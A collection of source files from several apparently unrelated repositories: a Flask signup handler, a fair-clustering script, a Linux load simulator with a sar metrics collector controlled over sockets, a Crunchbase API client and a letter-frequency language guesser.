_hash.update(_data)
return _hash.hexdigest()
class Signup(Resource):
def post(self):
try:
print(1)
# 지역변수로 로그인 폼 데이터 POST 받기 설정
_parser = reqparse.RequestParser()
_parser.add_argument('user_id', type=str)
_parser.add_argument('user_pw', type=str)
_parser.add_argument('user_pwconfirm', type=str)
_parser.add_argument('username', type=str)
_parser.add_argument('user_reginum', type=str)
_parser.add_argument('phonenum', type=int)
_parser.add_argument('emailfirst', type=str)
_parser.add_argument('emailsecond', type=str)
_args = _parser.parse_args()
print(2)
# 변수에 할당
print(_args)
_userid = _args['user_id']
_password = _args['<PASSWORD>']
_passwordconfirm = _args['<PASSWORD>']
_username = _args['username']
_reginum = _args['user_reginum']
_phonenum = _args['phonenum']
_emailfirst = _args['emailfirst']
_emailsecond = _args['emailsecond']
_email = _emailfirst+ "@" + _emailsecond
_salt = salt()
_newpassword = makepasswd(_password, _salt)
print(3)
print(_email)
# # user 중복체크
# _query = "select 1 from user where user_pw=%s" % (_password)
# cursor.execute(_query)
# _data = cursor.fetchall()
# print(_data)
# if _data:
# return {"duplicate": 401}
# 비밀번호 체크
if _password != _passwordconfirm:
return {"not match password": 404}
# gender 구하기
if _reginum[6] == "1" or _reginum[6] == "3":
_gender = "male"
elif _reginum[6] == "2" or _reginum[6] == "4":
_gender = "female"
else:
return {"Register number Not valid": 404}
_query = "INSERT INTO user(user_id, user_pw, salt, username, user_reginum, phonenum, email, gender) values(%s, %s, %s, %s, %s, %s, %s, %s)"
print(_query)
_value = (_userid, _newpassword, _salt, _username, _reginum, str(_phonenum), _email, _gender)
print(_value)
cursor.execute(_query, _value)
_data = cursor.fetchall()
print(_data)
if not _data:
conn.commit()
return {"Register Success": 200}
else:
conn.rollback()
return {"Register Failed": 404}
except Exception as e:
return {'error': "e"}
``` |
{
"source": "2018csb1082/Fair_Clustering",
"score": 3
} |
#### File: 2018csb1082/Fair_Clustering/Fair_Clustering.py
```python
import pandas as pd
import numpy as np
import math
import random
import time
import io
import random
import statistics
from itertools import combinations
# from google.colab import files
# uploaded = files.upload()
n=400
k=2
# creating data to be used
bank=pd.read_csv("D:/personel/codez/btp/trial/bank-original.csv",sep=";")
bank=bank.drop(['y','job','education','month','default','housing','loan','contact','day','pdays','previous','poutcome','campaign'],1)
bank=bank.drop(bank[bank['marital']=='divorced'].index)
gama=np.array(bank['marital'])
bank=bank.drop('marital',1)
raw_data=np.array(bank[0:n][:])
data = [list(raw_data[i]) for i in range(n)]
avg0 = avg1 = avg2 = 0
for i in range(n):
avg0 += data[i][0]
avg1 += data[i][1]
avg2 += data[i][2]
avg0 = avg0/n
avg1 = avg1/n
avg2 = avg2/n
col0 = [data[i][0] for i in range(n)]
col1 = [data[i][1] for i in range(n)]
col2 = [data[i][2] for i in range(n)]
var0 = math.sqrt(statistics.variance(col0))
var1 = math.sqrt(statistics.variance(col1))
var2 = math.sqrt(statistics.variance(col2))
for i in range(n):
data[i][0] = (data[i][0]-avg0)/var0
data[i][1] = (data[i][1]-avg1)/var1
data[i][2] = (data[i][2]-avg2)/var2
# print(len(data))
# print(data)
col1 = [data[i][0] for i in range(n)]
col2 = [data[i][1] for i in range(n)]
col3 = [data[i][2] for i in range(n)]
print(avg0,avg1,avg2)
print(max(col1),max(col2),max(col3))
print(min(col1),min(col2),min(col3))
# creating data to be used
data_group=[gama[i] for i in range(n)]
i=0
while (i<n):
if data_group[i] == 'married':
data_group[i] = 1
if data_group[i] == 'single':
data_group[i] = 0
i += 1
start=time.time()
print(len(data_group))
print(data_group)
# creating data to be used
distances = np.zeros((n, n))
avg_dist = i = count = 0
while i < n:
j = 0
while j < n:
# distances[i][j] = math.sqrt(((data[i][0]-data[j][0])*(data[i][0]-data[j][0]))+((data[i][1]-data[j][1])*(data[i][1]-data[j][1]))+((data[i][2]-data[j][2])*(data[i][2]-data[j][2])))
distances[i][j] = abs(((data[i][0]-data[j][0]))+((data[i][1]-data[j][1]))+((data[i][2]-data[j][2])))
avg_dist += distances[i][j]
count += 1
j += 1
i += 1
avg_dist = avg_dist/count
print(avg_dist)
# creating data to be used # not using anymore -- depricated
# indices = [i for i in range(n)]
# comb = list(combinations(indices, k))
# random.shuffle(comb)
# for i in comb:
# print(i)
# defining cost function
def cost_function():
group_cost = [0,0]
count_g0 = count_g1 = 0
for i in range(n):
curr_group = data_group[i]
curr_center = assignment[i]
count_g0 = count_g0 + 1 if curr_group == 0 else count_g0
count_g1 = count_g1 + 1 if curr_group == 1 else count_g1
group_cost[curr_group] = group_cost[curr_group] + distances[i][curr_center]
group_cost[0] = group_cost[0]/count_g0 if count_g0 != 0 else math.inf
group_cost[1] = group_cost[1]/count_g1 if count_g1 != 0 else math.inf
# print(group_cost)
return max(group_cost[0],group_cost[1])
starting_centers = []
starting_centers.append(random.randint(0,n-1))
starting_centers.append(random.randint(0,n-2))
if starting_centers[1] > starting_centers[0] - 1:
starting_centers[1] += 1
print(starting_centers)
chosen_centers = starting_centers
centers = starting_centers
print(centers)
chosen_assignment = [0]*n
assignment = [0]*n
for i in range(n):
minn = math.inf
for j in range(k):
curr_center = centers[j]
curr_distance = distances[i][curr_center]
if (curr_distance < minn):
minn = curr_distance
assignment[i] = j
chosen_assignment = assignment
print(assignment)
min_cost = cost_function()
print(min_cost)
# OLD METHOD FOR ITERATING OVER CENTERS # not using anymore -- depricated
# alfa = 1
# while alfa<len(comb):
# centers = comb[alfa]
# for i in range(n):
# minn = math.inf
# for j in range(k):
# curr_center = centers[j]
# curr_distance = distances[i][curr_center]
# if (curr_distance < minn):
# minn = curr_distance
# assignment[i] = j
# curr_cost = cost_function()
# min_cost = curr_cost if curr_cost<min_cost else min_cost
# chosen_centers = comb[alfa] if curr_cost<min_cost else chosen_centers
# chosen_assignment = assignment if curr_cost<min_cost else chosen_assignment
# if alfa%200 ==0:
# print("alfa: ",alfa)
# print("cost: ", min_cost)
# print("centers: ", comb[alfa])
# alfa+=1
# print("FINAL:")
# print(min_cost, chosen_centers)
# print(chosen_assignment)
flag = 0
alpha = 0
while (flag != 1):
alpha += 1
if alpha%10 == 0:
print(alpha)
flag = 1
# Check if any other point is a better center
r = list(range(n))
random.shuffle(r)
for c in r:
centers = list(chosen_centers)
# Try replacing first center
if (c != centers[0] and c != centers[1]):
# set new center
centers[0] = c
# do new assignment
for i in range(n):
minn = math.inf
for j in range(k):
curr_center = centers[j]
curr_distance = distances[i][curr_center]
if (curr_distance < minn):
minn = curr_distance
assignment[i] = j
# calculate new cost
curr_cost = cost_function()
# change variables if new cost is better
if curr_cost<min_cost:
min_cost = curr_cost
chosen_centers = centers
chosen_assignment = assignment
flag = 0
break
centers = list(chosen_centers)
# Try replacing second center
if (c != centers[1] and c != centers[0]):
# set new center
centers[1] = c
# do new assignment
for i in range(n):
minn = math.inf
for j in range(k):
curr_center = centers[j]
curr_distance = distances[i][curr_center]
if (curr_distance < minn):
minn = curr_distance
assignment[i] = j
# calculate new cost
curr_cost = cost_function()
# change variables if new cost is better
if curr_cost<min_cost:
min_cost = curr_cost
chosen_centers = centers
chosen_assignment = assignment
flag = 0
break
print("FINAL:")
print(min_cost, chosen_centers)
print(chosen_assignment)
end = time.time()
print("Time taken: ", end-start)
import matplotlib.pyplot as plt
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
for i in range(n):
xs = data[i][0]
ys = data[i][1]
zs = data[i][2]
if chosen_centers[0] == i or chosen_centers[1] == i:
c = 'red'
else:
if chosen_assignment[i] == 0:
if data_group[i] == 0:
c = 'navy'
else:
c = 'violet'
else:
if data_group[i] == 0:
c = 'yellow'
else:
c = 'lime'
ax.scatter(xs, ys, zs, c=c, marker='o')
ax.set_xlabel('Normalized Age')
ax.set_ylabel('Normalized Balance')
ax.set_zlabel('Normalized Duration')
ax.set_title('Best Cluster')
plt.show()
``` |
{
"source": "2018SEUer/LoadSimulator-Measuring",
"score": 2
} |
#### File: LoadSimulator-Measuring/Master Program/loadRunner.py
```python
from concurrent.futures import ThreadPoolExecutor
import subprocess, re, time
import os,sys,math,threading
import socket
# 全局变量的设定与初始化(!核心数和最大频率需要自行设定)
global cores_num
global freq_max
cores_num = 12 # CPU核心数量
freq_max = 2100 # CPU最大频率
level = [0,0,0,0,0,0,0,0,0,0,0] # 各项负载等级
tslp = 10000 # sleep time
t = 100000 # time
network = '192.168.0.1' # 用于网络加压
TCPwindow = 10 # 用于网络加压
'''
CPU
'''
# 根据百分比设置相应的频率
def freq_calculator():
freq_av=int(freq_max/10)
level[1]=freq_av
for n in range (2,11):
level[n]=level[n-1]+freq_av
# 获取当前开启的CPU核心数量
def cores_on_num():
grep_info=subprocess.Popen('''grep "processor" /proc/cpuinfo''', shell=True, stdout=subprocess.PIPE)
out0, err0=grep_info.communicate()
grep_str=out0.decode(encoding='utf-8', errors='ignore')
cores_on_num=len(re.findall('processor', grep_str))
return cores_on_num
# FUNC 1: 开启n个核心,参数为需要开启的核心数
def cores_on(n):
global cores_num
if int(n)>cores_num or int(n)==0:
raise Exception("wrong")
num=cores_on_num()
if int(n)>num:
for i in range(int(n)-num):
subprocess.call("echo '1' > /sys/devices/system/cpu/cpu%s/online"%str(num+i), shell=True)
if int(n)<num:
for i in range(num-int(n)):
subprocess.call("echo '0' > /sys/devices/system/cpu/cpu%s/online"%str(num-i-1), shell=True)
# FUNC 2: 将所有开启的核心数的频率限制在目标频率
def freq_set(f):
subprocess.call('cpupower frequency-set -f %s'%str(f), shell=True)
# FUNC 3: 给当前开启的核心进行加压,参数为加压百分比
def stress(s,t,tslp):
lookbusy_p=subprocess.Popen('lookbusy -c %s --quiet'%(str(s)), shell=True)
time.sleep(t)
# 杀死lookubusy加压进程
subprocess.call('pkill -9 lookbusy', shell=True)
time.sleep(tslp)
'''
disk
'''
def diskstress(e,t,tslp):
# 定义无限循环量,十个不同层级来定义硬盘io负载
var=0
T0=time.time()
if e==0:
while(time.time()-T0<=t):
os.system('iozone -i 0 -r 4K -s 4K -I')
if e==1:
while(time.time()-T0<=t):
os.system('iozone -i 0 -r 4K -s 128K -I')
if e==2:
while(time.time()-T0<=t):
os.system('iozone -i 0 -r 4K -s 640K -I')
if e==3:
while(time.time()-T0<=t):
os.system('iozone -i 0 -r 4K -s 2048K -I')
if e==4:
while(time.time()-T0<=t):
os.system('iozone -i 0 -r 4K -s 4608K -I')
if e==5:
while(time.time()-T0<=t):
os.system('iozone -i 0 -r 4K -s 8M -I')
if e==6:
while(time.time()-T0<=t):
os.system('iozone -i 0 -r 4K -s 10M -I')
if e==7:
while(time.time()-T0<=t):
os.system('iozone -i 0 -r 4K -s 32M -I')
if e==8:
while(time.time()-T0<=t):
os.system('iozone -i 0 -r 4K -s 128M -I')
if e==9:
while(time.time()-T0<=t):
os.system('iozone -i 0 -r 4K -s 512M -I')
if e==10:
while(time.time()-T0<=t):
os.system('iozone -i 0 -r 4K -s 1024M -I')
print('disk success!')
time.sleep(tslp)
'''
memory
'''
def memorystress(z,t,tslp):
sar_r_info=subprocess.Popen('sar -r ALL 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_r_info.communicate()
sar_r_str=out0.decode(encoding='utf-8', errors='ignore')
lines_r=len(sar_r_str.split('\n'))
sar_r_str=sar_r_str.split('\n')
for i in range(0,lines_r-1):
count_r=len(sar_r_str[i].split())
sar_r_str[i]=sar_r_str[i].split()
if count_r==17:
for j in range(0,count_r):
try:
sar_r_str[i][j]=float(sar_r_str[i][j])
except ValueError:
sar_r_str[i][j]=sar_r_str[i][j]
if sar_r_str[i][1]!='kbmemfree':
m=int(z)*10+30-sar_r_str[i][4];
m=int(m*(sar_r_str[i][1]+sar_r_str[i][2])/100)
str_m='stress --vm 1 --vm-bytes '+str(m)+'K --vm-hang 100 --timeout '+str(t)+'s'
stress_r_info=subprocess.Popen(str_m, shell=True, stdout=subprocess.PIPE)
time.sleep(int(tslp))
'''
network
'''
def networkstress(network,TCPwindow,j,t,tslp):
TCPwindow=int(TCPwindow)*float(j)
TCPwindow=str(TCPwindow)+'M'
str_sys='iperf3 -c %s -b %s -d m -t '+str(t)
# TCP模式加压
os.system(str_sys%(network,TCPwindow))
time.sleep(tslp)
#---------------------------------#
# main函数 #
#---------------------------------#
if __name__ == "__main__":
#-----------更新部分全局变量-----------
# 将当前cpu核心数赋值给全局变量core_num
cores_num=cores_on_num()
# 设置cpu核心的最大频率
freq_max=800000000
freq_calculator()
pool=ThreadPoolExecutor(max_workers=6)
#-----------socket通信部分-----------
# 创建一个tcp/ip协议的套接字
clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("-------------")
print(clientSocket)
print("-------------")
# 服务端IP地址 (!需要自行设定)
IP1 = "192.168.10.101"
host = IP1
# 端口号 (!需要自行设定)
port = 8008
buffer_size = 1024
address = (host, port)
print("-------------")
print(address)
print("-------------")
clientSocket.connect(address)
print("等待服务端发送信息:")
while(True):
data = clientSocket.recv(1024)
data = data.decode("utf-8")
print(data)
if data=="连接服务器成功":
print(data)
elif data=='STOP':
pool.shutdown(wait=True)
else :
x=data.split()
results = list(map(int, x))
cores_on(results[0])
freq_set(level[int(results[1]/10)])
pool.submit(stress,results[2],t,tslp)
pool.submit(memorystress,results[3],t,tslp)
pool.submit(diskstress,results[4],t)
pool.submit(networkstress,network,TCPwindow,results[5],t,tslp)
# __END__OF__LOADRUNNER_PY__
```
#### File: LoadSimulator-Measuring/Master Program/sar.py
```python
import socket, time, subprocess, sys, os, math, time, sqlite3
# 获取当前时间戳
def sar_collect():
datetime=year+'-'+month+'-'+day+' '+hour+':'+minute+':'+second
timestamp=int(time.mktime(time.strptime(datetime, '%Y-%m-%d %H:%M:%S')))
return timestamp
'''
date&time
'''
# 获取当前日期
def getDate():
year=time.strftime('%Y')
month=time.strftime('%m')
day=time.strftime('%d')
hour=time.strftime('%H')
minute=time.strftime('%M')
second=time.strftime('%S')
print('打印当前日期:',year,month,day,hour,minute,second)
return year,month,day,hour,minute,second
# 将一定格式的日期时间字符串转换为Unix timestamp
def dt_stamp(year, month, day, hour, minute, second):
datetime=year+'-'+month+'-'+day+' '+hour+':'+minute+':'+second
timestamp=int(time.mktime(time.strptime(datetime, '%Y-%m-%d %H:%M:%S')))
return timestamp
'''
CPU
'''
# 采集CPU的相关数据
def gather_cpu():
sar_gather=''
sar_cpu_info=subprocess.Popen('sar -u ALL -P ALL 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_cpu_info.communicate()
sar_cpu_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_cpu_str.split('\n'))
sar_cpu_str=sar_cpu_str.split('\n')
for i in range(0,lines):
count_r=len(sar_cpu_str[i].split())
sar_cpu_str[i]=sar_cpu_str[i].split()
if count_r==12:
for j in range(0,count_r):
try:
sar_cpu_str[i][j]=float(sar_cpu_str[i][j])
except ValueError:
sar_cpu_str[i][j]=sar_cpu_str[i][j]
if sar_cpu_str[i][1]=="all":
if j>=2:
sar_gather+=str(sar_cpu_str[i][j])
sar_gather+=' '
return sar_gather
# 采集CPU的频率
def gather_cpuMHz():
sar_gather=''
sar_cpu_info=subprocess.Popen('sar -m CPU -P ALL 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_cpu_info.communicate()
sar_cpu_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_cpu_str.split('\n'))
sar_cpu_str=sar_cpu_str.split('\n')
for i in range(0,lines):
count_r=len(sar_cpu_str[i].split())
sar_cpu_str[i]=sar_cpu_str[i].split()
if count_r==3:
for j in range(0,count_r):
try:
sar_cpu_str[i][j]=float(sar_cpu_str[i][j])
except ValueError:
sar_cpu_str[i][j]=sar_cpu_str[i][j]
if sar_cpu_str[i][1]=="all":
if j>=2:
sar_gather+=str(sar_cpu_str[i][j])
sar_gather+=' '
return sar_gather
'''
memory
'''
# 采集内存的相关数据
def gather_memory():
sar_gather=''
sar_mem_info=subprocess.Popen('sar -r ALL 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_mem_info.communicate()
sar_mem_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_mem_str.split('\n'))
sar_mem_str=sar_mem_str.split('\n')
for i in range(0,lines):
count_r=len(sar_mem_str[i].split())
sar_mem_str[i]=sar_mem_str[i].split()
if count_r==16:
for j in range(0,count_r):
try:
sar_mem_str[i][j]=float(sar_mem_str[i][j])
except ValueError:
sar_mem_str[i][j]=sar_mem_str[i][j]
if sar_mem_str[i][1]!="kbmemfree":
if j>=3 and j!=4 and j!=5 and j!=6 and j!=12 :
sar_gather+=str(sar_mem_str[i][j])
sar_gather+=' '
sar_mem_info=subprocess.Popen('sar -B 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_mem_info.communicate()
sar_mem_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_mem_str.split('\n'))
sar_mem_str=sar_mem_str.split('\n')
for i in range(0,lines):
count_r=len(sar_mem_str[i].split())
sar_mem_str[i]=sar_mem_str[i].split()
if count_r==10:
for j in range(0,count_r):
try:
sar_mem_str[i][j]=float(sar_mem_str[i][j])
except ValueError:
sar_mem_str[i][j]=sar_mem_str[i][j]
if sar_mem_str[i][1]!="pgpgin/s":
if j>=1 and j!=7:
sar_gather+=str(sar_mem_str[i][j])
sar_gather+=' '
return sar_gather
'''
disk
'''
# 采集磁盘的相关数据
def gather_disk():
sar_gather=''
sar_disk_info=subprocess.Popen('sar -d 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_disk_info.communicate()
sar_disk_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_disk_str.split('\n'))
sar_disk_str=sar_disk_str.split('\n')
for i in range(0,lines):
count_r=len(sar_disk_str[i].split())
sar_disk_str[i]=sar_disk_str[i].split()
if count_r==10:
for j in range(0,count_r):
try:
sar_disk_str[i][j]=float(sar_disk_str[i][j])
except ValueError:
sar_disk_str[i][j]=sar_disk_str[i][j]
if sar_disk_str[i][1]=="dev8-0":
if j>=2:
sar_gather+=str(sar_disk_str[i][j])
sar_gather+=' '
return sar_gather
'''
network
'''
# 采集网络的相关数据
def gather_network():
sar_gather=''
sar_net_info=subprocess.Popen('sar -n DEV 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_net_info.communicate()
sar_net_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_net_str.split('\n'))
sar_net_str=sar_net_str.split('\n')
for i in range(0,lines):
count_r=len(sar_net_str[i].split())
sar_net_str[i]=sar_net_str[i].split()
if count_r==10:
for j in range(0,count_r):
try:
sar_net_str[i][j]=float(sar_net_str[i][j])
except ValueError:
sar_net_str[i][j]=sar_net_str[i][j]
if sar_net_str[i][1]=="wlp3s0":
if j>=2:
sar_gather+=str(sar_net_str[i][j])
sar_gather+=' '
sar_net_info=subprocess.Popen('sar -n EDEV 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_net_info.communicate()
sar_net_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_net_str.split('\n'))
sar_net_str=sar_net_str.split('\n')
for i in range(0,lines):
count_r=len(sar_net_str[i].split())
sar_net_str[i]=sar_net_str[i].split()
if count_r==11:
for j in range(0,count_r):
try:
sar_net_str[i][j]=float(sar_net_str[i][j])
except ValueError:
sar_net_str[i][j]=sar_net_str[i][j]
if sar_net_str[i][1]=="wlp3s0":
if j>=2:
sar_gather+=str(sar_net_str[i][j])
sar_gather+=' '
return sar_gather
'''
task
'''
# 采集任务的相关数据
def gather_q():
sar_gather=''
sar_task_info=subprocess.Popen('sar -q 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_task_info.communicate()
sar_task_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_task_str.split('\n'))
sar_task_str=sar_task_str.split('\n')
for i in range(0,lines):
count_r=len(sar_task_str[i].split())
sar_task_str[i]=sar_task_str[i].split()
if count_r==7:
for j in range(0,count_r):
try:
sar_task_str[i][j]=float(sar_task_str[i][j])
except ValueError:
sar_task_str[i][j]=sar_task_str[i][j]
if sar_task_str[i][1]!="runq-sz" and sar_task_str[i][0]!="Linux":
if j>=1:
sar_gather+=str(sar_task_str[i][j])
sar_gather+=' '
return sar_gather
'''
interrupt
'''
# 采集中断的相关数据
def gather_I():
sar_gather=''
sar_intr_info=subprocess.Popen('sar -I 1 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_intr_info.communicate()
sar_intr_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_intr_str.split('\n'))
sar_intr_str=sar_intr_str.split('\n')
for i in range(0,lines):
count_r=len(sar_intr_str[i].split())
sar_intr_str[i]=sar_intr_str[i].split()
if count_r==3:
for j in range(0,count_r):
try:
sar_intr_str[i][j]=float(sar_intr_str[i][j])
except ValueError:
sar_intr_str[i][j]=sar_intr_str[i][j]
if sar_intr_str[i][1]!="INTR":
if j==2:
sar_gather+=str(sar_intr_str[i][j])
sar_gather+=' '
return sar_gather
'''
process
'''
# 采集I/O的相关数据
def gather_w():
sar_gather=''
sar_prcs_info=subprocess.Popen('sar -w 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_prcs_info.communicate()
sar_prcs_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_prcs_str.split('\n'))
sar_prcs_str=sar_prcs_str.split('\n')
for i in range(0,lines):
count_r=len(sar_prcs_str[i].split())
sar_prcs_str[i]=sar_prcs_str[i].split()
if count_r==3:
for j in range(0,count_r):
try:
sar_prcs_str[i][j]=float(sar_prcs_str[i][j])
except ValueError:
sar_prcs_str[i][j]=sar_prcs_str[i][j]
if sar_prcs_str[i][1]!="proc/s":
if j>=1:
sar_gather+=str(sar_prcs_str[i][j])
sar_gather+=' '
return sar_gather
'''
io
'''
# 采集磁盘的相关数据
def gather_b():
sar_gather=''
sar_io_info=subprocess.Popen('sar -b 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_io_info.communicate()
sar_io_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_io_str.split('\n'))
sar_io_str=sar_io_str.split('\n')
for i in range(0,lines):
count_r=len(sar_io_str[i].split())
sar_io_str[i]=sar_io_str[i].split()
if count_r==6:
for j in range(0,count_r):
try:
sar_io_str[i][j]=float(sar_io_str[i][j])
except ValueError:
sar_io_str[i][j]=sar_io_str[i][j]
if sar_io_str[i][1]!="tps":
if j>=1:
sar_gather+=str(sar_io_str[i][j])
sar_gather+=' '
return sar_gather
'''
swap
'''
# 采集交换区的相关数据
def gather_W():
sar_gather=''
sar_swap_info=subprocess.Popen('sar -W 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_swap_info.communicate()
sar_swap_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_swap_str.split('\n'))
sar_swap_str=sar_swap_str.split('\n')
for i in range(0,lines):
count_r=len(sar_swap_str[i].split())
sar_swap_str[i]=sar_swap_str[i].split()
if count_r==3:
for j in range(0,count_r):
try:
sar_swap_str[i][j]=float(sar_swap_str[i][j])
except ValueError:
sar_swap_str[i][j]=sar_swap_str[i][j]
if sar_swap_str[i][1]!="pswpin/s":
if j>=1:
sar_gather+=str(sar_swap_str[i][j])
sar_gather+=' '
return sar_gather
'''
swap
'''
# 采集交换区的相关数据
def gather_S():
sar_gather=''
sar_swap_info=subprocess.Popen('sar -S 0', shell=True, stdout=subprocess.PIPE)
out0, err0=sar_swap_info.communicate()
sar_swap_str=out0.decode(encoding='utf-8', errors='ignore')
lines=len(sar_swap_str.split('\n'))
sar_swap_str=sar_swap_str.split('\n')
for i in range(0,lines):
count_r=len(sar_swap_str[i].split())
sar_swap_str[i]=sar_swap_str[i].split()
if count_r==6:
for j in range(0,count_r):
try:
sar_swap_str[i][j]=float(sar_swap_str[i][j])
except ValueError:
sar_swap_str[i][j]=sar_swap_str[i][j]
if sar_swap_str[i][1]!="kbswpfree":
if j>=3 and j!=4:
sar_gather+=str(sar_swap_str[i][j])
sar_gather+=' '
return sar_gather
'''
数据汇总
'''
def gather():
year,month,day,hour,minute,second=getDate()
# 制作时间戳
timestamp=dt_stamp(year, month, day, hour, minute, second)
sar_gather=''
# sar_gather[1~10]: %usr %nice %sys %iowait %steal %irq %soft %guest %gnice %idle
sar_gather+=gather_cpu()
# sar_gather[11]: MHz
sar_gather+=gather_cpuMHz()
# sar_gether[12-20]:%memused %commit kbactive kbinact kbdirty kbanonpg kbstack kbpgtbl kbvmused
# sar_gather[21-28]:pgpgin/s pgpgout/s fault/s majflt/s pgfree/s pgscank/s pgsteal/s %vmeff
sar_gather+=gather_memory()
# sar_gather[29-36]:tps rd_sec/s wr_sec/s avgrq-sz avgqu-sz await svctm %util
sar_gather+=gather_disk()
# sar_gather[37-53]:rxpck/s txpck/s rxkB/s txkB/s rxcmp/s txcmp/s rxmcst/s %ifutil rxerr/s txerr/s coll/s rxdrop/s txdrop/s txcarr/s rxfram/s rxfifo/s txfifo/s
sar_gather+=gather_network()
# sar_gather[54-59]: runq-sz plist-sz ldavg-1 ldavg-5 ldavg-15 blocked
sar_gather+=gather_q()
# sar_gather[60]:intr/s
sar_gather+=gather_I()
# sar_gather[61-62]:proc/s cswch/s
sar_gather+=gather_w()
# sar_gather[63-67]: tps rtps wtps bread/s bwrtn/s
sar_gather+=gather_b()
# sar_gather[68-69]:pswpin/s pswpout/s
sar_gather+=gather_W()
# sar_gather[70-71]: %swpused %swpcad
sar_gather+=gather_S()
# 在sar_gather输出的第一个符号前添加时间戳
sar_gather=str(timestamp)+' '+sar_gather
return sar_gather
#---------------------------------#
# main函数 #
#---------------------------------#
if __name__ =="__main__":
#----------socket通信部分----------
clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print(clientSocket)
# 服务端的IP和端口号等(!需要自己进行设定)
host = socket.gethostname()
IP = "192.168.10.101"
host = IP
port = 8080
buffer_size = 1024
address = (host, port)
print(address)
clientSocket.connect(address)
print("连接服务器成功")
print("等待服务端发送信息...")
# 与服务端进行通信
while(1):
infor = clientSocket.recv(1024)
command=infor.decode("utf-8")
print("从服务器接受到消息",command)
print("开始输出sar 的cpu、memory、disk、network等信息")
if command=="COLLECT":
data=gather()
# 将收集到的信息作为有一定顺序的字符串
information=data
clientSocket.send(information.encode("utf-8"))
# 关闭socket连接
clientSocket.close()
# __END__OF__SAR_PY__
``` |
{
"source": "2018sjain/crunchbase-investments",
"score": 3
} |
#### File: 2018sjain/crunchbase-investments/company.py
```python
import requests
import json
from person import Person
class Company:
global user_key
user_key = '' #input crunchbase API key
def __init__(self, name, permalink, fund):
self.name = name
self.permalink = permalink
self.fund = fund
self.categories, self.location = self.self_populate()
self.type = "COMPANY"
self.team = self.gen_team()
def get_name(self):
return self.name
def set_name(self, name):
self.name = name
def get_permalink(self):
return self.permalink
def set_permalink(self, permalink):
self.permalink = permalink
def get_fund(self):
return self.fund
def set_fund(self, fund):
self.fund = fund
def get_categories(self):
return self.categories
def set_categories(self, categories):
self.categories = categories
def get_location(self):
return self.location
def set_location(self, location):
self.location = location
def get_type(self):
return self.type
def set_type(self, types):
self.type = types
def get_team(self):
return self.team
def set_team(self, team):
self.team = team
def self_populate(self):
location = ""
data_loc = requests.get("https://api.crunchbase.com/v3/organizations/" + self.permalink + "/headquarters?user_key=" + user_key).json()
try:
location = data_loc['data']['items'][0]['properties']['region']
except IndexError as e:
pass
data_cat = requests.get("https://api.crunchbase.com/v3/organizations/" + self.permalink + "/categories?user_key=" + user_key).json()
categories = []
temp_cat = data_cat['data']['items']
for item in temp_cat:
categories.append(item['properties']['name'])
return categories, location
def gen_team(self):
data_team = requests.get("https://api.crunchbase.com/v3/organizations/" + self.permalink + "/current_team?user_key=" + user_key).json()
team = []
temp_team = data_team['data']['items']
for item in temp_team:
permalink = item['relationships']['person']['properties']['permalink']
team.append(Person(permalink, self))
return team
``` |
{
"source": "2018sjain/pylingual",
"score": 3
} |
#### File: pylingual/assets/predict.py
```python
import numpy as np
import string
import re
# pulling respective letter data from 'data' folder
en = [np.load('data/english_one.npy'),
np.load('data/english_two.npy'),
np.load('data/english_three.npy'),
'english']
es = [np.load('data/spanish_one.npy'),
np.load('data/spanish_two.npy'),
np.load('data/spanish_three.npy'),
'spanish']
fr = [np.load('data/french_one.npy'),
np.load('data/french_two.npy'),
np.load('data/french_three.npy'),
'french']
de = [np.load('data/german_one.npy'),
np.load('data/german_two.npy'),
np.load('data/german_three.npy'),
'german']
# converts input to letter characters
def clean(word):
return re.sub('[^a-zA-Z\n\.]', ' ', word.translate(str.maketrans('','',string.punctuation)))
# converts character to corresponding number
def num(letter):
letter = letter.lower()
if letter == ' ': return 0
return ord(letter) - 96
# converts array of values to percentages of each value
def percents(vals):
total = sum(vals)
if total == 0: total = 1
percents = [round((var/total)*100, 2) for var in vals]
return percents
# pulls letter data from previous datasets
def one_chance(letter, lang):
return lang[0][num(letter)]
def two_chance(letter_a, letter_b, lang):
return lang[1][num(letter_a)][num(letter_b)]
def three_chance(letter_a, letter_b, letter_c, lang):
return lang[2][num(letter_a)][num(letter_b)][num(letter_c)]
# calculates the structural similarity of inputted word to each respective language letter structure
def calculate(user_input, lang, a, b, c):
one_prob = 1
two_prob = 1
three_prob = 1
for letter in user_input:
one_prob *= one_chance(letter, lang)
for letter in range(len(user_input)-1):
two_prob *= two_chance(user_input[letter], user_input[letter+1], lang)
for letter in range(len(user_input)-2):
three_prob *= three_chance(user_input[letter], user_input[letter+1], user_input[letter+2], lang)
return (a*one_prob) + (b*two_prob) + (c*three_prob)
# current user input and processing
user_input = 'I went to the library.'
user_input = clean(user_input.lower())
print('input: ' + user_input + '\n\n' + 'results:' )
results = []
languages = [en, es, fr, de]
for lang in languages:
# optimal weights: 2, 12, 4
prob = calculate(user_input, lang, 2, 12, 4)
results.append((prob, lang[3]))
